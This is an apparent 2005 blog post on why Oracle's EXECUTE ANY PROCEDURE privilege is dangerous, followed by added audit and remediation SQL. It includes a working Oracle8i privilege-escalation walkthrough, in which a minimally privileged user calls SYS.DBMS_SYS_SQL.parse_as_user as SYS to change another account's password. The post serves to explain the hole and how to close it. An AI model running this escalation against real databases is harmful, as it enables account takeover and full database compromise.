
Why is "EXECUTE ANY PROCEDURE" a dangerous PRIVILEGE?

Original post by eygle, 2005-05-10

Tom Kyte has said more than once:


All I need is "CREATE SESSION" and "EXECUTE ANY PROCEDURE" and
I can totally do anything I want to in your database.

So where does the danger of EXECUTE ANY PROCEDURE come from?

Let us look at an example to understand the risk.

1. Create the test users


$ sqlplus "/ as sysdba"
SQL*Plus: Release 8.1.7.0.0 - Production on Tue May 10 09:57:41 2005
(c) Copyright 2000 Oracle Corporation. All rights reserved.
Connected to:
Oracle8i Enterprise Edition Release 8.1.7.4.0 - 64bit Production
With the Partitioning option
JServer Release 8.1.7.4.0 - 64bit Production
SQL> create user hacker identified by hacker default tablespace users temporary
2 tablespace temp;
User created.
SQL> grant create session to hacker;
Grant succeeded.
SQL> grant execute any procedure to hacker;
Grant succeeded.
SQL> create user loser identified by loser default tablespace users temporary
2 tablespace temp;
User created.
SQL> grant connect to loser;
Grant succeeded.


2. Connect as the test user

Note that at this point the user hacker can see and execute the SYS-owned package dbms_sys_sql, because on Oracle8i the EXECUTE ANY PROCEDURE system privilege also covers objects in the SYS schema.


SQL> connect hacker/hacker
Connected.
SQL> desc sys.dbms_sys_sql
PROCEDURE BIND_ARRAY
Argument Name Type In/Out Default?
------------------------------ ----------------------- ------ --------
C NUMBER(38) IN
NAME VARCHAR2 IN
N_TAB TABLE OF NUMBER IN
PROCEDURE BIND_ARRAY
Argument Name Type In/Out Default?
------------------------------ ----------------------- ------ --------
C NUMBER(38) IN
NAME VARCHAR2 IN
C_TAB TABLE OF VARCHAR2(2000) IN
....
PROCEDURE VARIABLE_VALUE_ROWID
Argument Name Type In/Out Default?
------------------------------ ----------------------- ------ --------
C NUMBER(38) IN
NAME VARCHAR2 IN
VALUE ROWID OUT


3. What does this mean?


SQL> connect hacker/hacker
Connected.
SQL> DECLARE
2 UID NUMBER;
3 sqltext VARCHAR2 (100) := 'alter user loser identified by test';
4 c INTEGER;
5 BEGIN
6 c := SYS.DBMS_SYS_SQL.open_cursor ();
7 SYS.DBMS_SYS_SQL.parse_as_user (c, sqltext, DBMS_SQL.native, 0);
8 SYS.DBMS_SYS_SQL.close_cursor (c);
9 END;
10 /

PL/SQL procedure successfully completed.


Through DBMS_SYS_SQL.parse_as_user, hacker can now run arbitrary statements in the database. The last argument of parse_as_user is the user id the statement is parsed as; 0 is the USER_ID of SYS (see DBA_USERS), so the ALTER USER statement runs with SYS's privileges. Because DDL is executed at parse time, no separate execute call is needed.

The password of user loser has been changed:


SQL> connect loser/loser
ERROR:
ORA-01017: invalid username/password; logon denied
Warning: You are no longer connected to ORACLE.
SQL> connect loser/test
Connected.
SQL>


4. Note the version

In fact this hole exists only in Oracle8i. From Oracle9i onward, even a user with EXECUTE ANY PROCEDURE cannot reach DBMS_SYS_SQL, because the initialization parameter O7_DICTIONARY_ACCESSIBILITY, which controls whether the ANY system privileges extend to objects in the SYS schema, now defaults to FALSE (it defaulted to TRUE in 8i). On an 8i database, setting O7_DICTIONARY_ACCESSIBILITY = FALSE in init.ora (and restarting) gives the same protection.
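The audit and remediation a DBA would want after reading the walkthrough above, as an added example that is not part of the original post: find every account that holds EXECUTE ANY PROCEDURE (directly or through any chain of roles), check the parameter that gates ANY privileges against SYS-owned objects, and revoke the grant. It assumes a standard data dictionary (DBA_SYS_PRIVS, DBA_ROLE_PRIVS, V$PARAMETER) and is run as SYSDBA; the account name hacker is the one from the walkthrough.

```sql
-- Added example (not from the original article). Run as SYSDBA.

-- 1. Accounts and roles that hold EXECUTE ANY PROCEDURE directly.
SELECT grantee, admin_option
  FROM dba_sys_privs
 WHERE privilege = 'EXECUTE ANY PROCEDURE'
 ORDER BY grantee;

-- 2. Accounts that reach the privilege through a role, at any nesting depth.
--    Start from each role that holds the privilege and walk DBA_ROLE_PRIVS
--    downward: the next row's GRANTED_ROLE is the previous row's GRANTEE.
SELECT DISTINCT grantee, granted_role AS via_role, LEVEL AS depth
  FROM dba_role_privs
 START WITH granted_role IN (SELECT grantee
                               FROM dba_sys_privs
                              WHERE privilege = 'EXECUTE ANY PROCEDURE')
CONNECT BY PRIOR grantee = granted_role
 ORDER BY grantee;

-- 3. Does the ANY privilege extend to SYS-owned packages such as DBMS_SYS_SQL?
--    TRUE (the 8i default) means yes; FALSE (the 9i+ default) means no.
SELECT name, value
  FROM v$parameter
 WHERE name = 'O7_DICTIONARY_ACCESSIBILITY';

-- 4. Remediation for the test account from the walkthrough.
REVOKE EXECUTE ANY PROCEDURE FROM hacker;

-- 5. Re-run query 1: hacker must no longer appear, and a fresh
--    "desc sys.dbms_sys_sql" as hacker should now fail.
SELECT grantee
  FROM dba_sys_privs
 WHERE privilege = 'EXECUTE ANY PROCEDURE'
   AND grantee = 'HACKER';
```

Query 2 matters more than query 1 in practice: the privilege is rarely granted to a user by name, but it often rides in on a broad custom role, and a role can be granted to another role, so only the hierarchical walk shows who can actually call parse_as_user. On 8i, revoking the privilege from individual accounts is a stopgap; the durable fix is O7_DICTIONARY_ACCESSIBILITY = FALSE in init.ora, which is a static parameter and takes effect after a restart.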